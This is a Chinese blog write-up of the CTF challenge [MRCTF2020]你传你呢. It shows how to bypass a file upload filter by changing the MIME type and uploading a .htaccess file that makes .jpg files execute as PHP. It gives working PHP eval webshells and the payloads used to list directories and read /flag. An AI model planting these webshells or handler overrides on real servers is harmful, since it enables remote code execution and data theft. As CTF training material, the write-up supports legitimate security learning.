首页 > 其他分享 >[MRCTF2020]你传你呢

[MRCTF2020]你传你呢

时间:2023-10-09 14:57:26浏览次数:40  
标签:dump jpg MIME var php 上传 MRCTF2020

原理

  1. .htaccess文件解析漏洞
  2. 以及MIME的修改,注意注意,三种MIME值png,jpg,gif不行的话都要试一遍,不要错过啦- -
  3. 手搓连接木马的系统命令多种使用方式
  4. payload:var_dump(scandir('/')); echo file_get_contents('/flag');

解题过程

进入靶场,让上传文件

上传文件抓包,发现包被过滤了,先试试改MIME值

发现MIME值改成png就能上传了

但是上传的只是gif文件,把文件后缀换成php,phtml等等都不行被过滤了。再试试上传.htaccess
同理修改MIME值才能过

.htaccess写法
方法一
<FilesMatch "1.jpg">
  SetHandler application/x-httpd-php
</FilesMatch>
// 1.jpg
<?php eval($_GET['a']);?>

方法二:
AddType application/x-httpd-php .jpg
// 1.jpg
<?php eval($_GET['a']);?>
php木马写法
<script language='php'>@eval($_POST['aaa']);</script>
<?php @eval($_POST['aaa']);?>

那就用工具连接或者手动连接了

手动连接的时候参数echo system('ls /')或者var_dump(system('ls /'))都不行
只有var_dump(scandir('/'))才可以读出目录
最后读取文件内容
var_dump(file_get_contents('/flag'));

参考文章:https://blog.csdn.net/weixin_44632787/article/details/118049911

标签:dump,jpg,MIME,var,php,上传,MRCTF2020
From: https://www.cnblogs.com/BEONTHE/p/17751711.html

相关文章

  • BUUCTF:[MRCTF2020]Ez_bypass
    https://buuoj.cn/challenges#[MRCTF2020]Ez_bypass右键查看源代码include'flag.php';$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';if(isset($_GET['gg'])&&isset($_GET['id'])){$id=$_GET['id'];$gg=$_GET......
  • BUUCTF: [MRCTF2020]Ezpop
    https://buuoj.cn/challenges#[MRCTF2020]Ezpop<?phpclassModifier{protected$var;publicfunctionappend($value){include($value);}publicfunction__invoke(){$this->append($this->var);}}classShow{......
  • MISC|[MRCTF2020]Unravel!!
    解压得到三个文件其中有一个音频叫Look_at_the_file_ending.wav,暗示看文件尾部,使用010editor打开发现key,应该是压缩包的解压密码,但是直接试失败key=U2FsdGVkX1/nSQN+hoHL8OwV9iJB/mSdKk5dmusulz4=查看JM.png文件发现尾部有压缩包使用foremost分离得到图片,图片名称为aes......
  • WEB|[MRCTF2020]套娃
    查看网页源码发现代码$query=$_SERVER['QUERY_STRING'];if(substr_count($query,'_')!==0||substr_count($query,'%5f')!=0){die('Y0uareSocutE!');}if($_GET['b_u_p_t']!=='23333'&&am......
  • [MRCTF2020]Transform 1
    查壳:64位,先看看运行有问题吗:任意输入给你弹了一个wrong进IDA看看:解释:输入一个字符串,要满足字符串的长度为33,不然就报错。接下来是在输入的字符串中拿出特定的字符,进行异或后得到一个新的字符串,最后与特定的字符串对比。这样看来,我们先看要对比的字符串:还不短,但是我们只......
  • [MRCTF2020]Ezpop
    1.解题过程1.题目源代码<?php//flagisinflag.php//WTFISTHIS?//LearnFromhttps://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%......
  • [MRCTF2020]Ezaudit
    [MRCTF2020]Ezaudit考点:php的伪随机数好复杂的页面,搜索了一下php、form等可能可以利用的字段无果,然后猜测有备份,果然尝试了一下www.zip,里面有一个index.php<?phpheade......
  • re | [MRCTF2020]VirtualTree
    re|[MRCTF2020]VirtualTree这个题是一个错题,是有多解的。原因是使用了abs函数考察了二叉树后序遍历,和一点基本花指令,还有一点点smc的内容。直接丢exp了:#include<s......
  • buuctf-web-[MRCTF2020]Ez_bypass
    知识点:md5的强弱比较==先将字符串类型转化成相同,再比较===先判断两种字符串的类型是否相等,再比较。先看代码关键部分if(md5($id)===md5($gg)&&$id!==$gg){......
  • buuoj-[MRCTF2020]Xor
    1.winexe32bit无壳2.进入程序无法反汇编去查了百度3.很简单的异或数据是MRCTF{@_R3@1ly_E2_R3verse!}异或它的index就好了str='MSAWB~FXZ:J:`tQJ"N@bpdd}8g'......